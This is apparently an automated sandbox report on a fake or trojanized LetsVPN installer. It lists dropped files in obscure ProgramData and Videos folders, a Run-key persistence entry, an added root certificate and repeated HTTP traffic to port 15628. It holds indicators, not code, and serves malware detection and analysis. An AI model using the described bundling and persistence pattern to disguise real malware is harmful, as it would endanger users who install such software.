              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\microsoft.identitymodel.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsProcess.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Odbc.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\msvcr120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.Extensions.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Sockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\uninst.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Syndication.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Process.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SharpCompress.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dllJump to dropped file
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\D73040F4~16\base.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Primitives.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dllJump to dropped file
              Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETBDCE.tmpJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.Messages.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tools.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Pkcs.dllJump to dropped file
              Source: C:\Users\user\Desktop\letsVPN.exeFile created: C:\ProgramData\Jm42a\Q4nO1~16\FileSplit.exeJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.AccessControl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Cng.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Security.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Dynamic.Runtime.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hant\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.Extensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB620.tmp
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x64\native\e_sqlite3.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsDialogs.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Ping.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.TypeConverter.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.FileVersionInfo.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ObjectModel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ja\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Algorithms.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ko\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\tr\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Local\Temp\nse1A1D.tmp\nsExec.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Primitives.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Configuration.ConfigurationManager.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-Hans\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.CodePages.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Concurrent.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Primitives.dll
              Source: C:\Windows\System32\cmd.exe File created: C:\ProgramData\Jm42a\Q4nO1~16\base.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\Jm42a\Q4nO1~16\msvcr120.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\Jm42a\Q4nO1~16\msvcp120.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\Jm42a\Q4nO1~16\s
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\Jm42a\Q4nO1~16\FileSplit.exe
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\letsvpn-latest.exe
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\drivers\SETBDCE.tmp
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\drivers\tap0901.sys (copy)
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.sys (copy)
              Source: C:\Windows\System32\drvinst.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tap0901
              Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnk
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnk
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 15628
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180010D70 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0000000180010D70
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob
              Source: C:\Users\user\Desktop\letsVPN.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mmc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\letsvpn-latest.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\drvinst.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
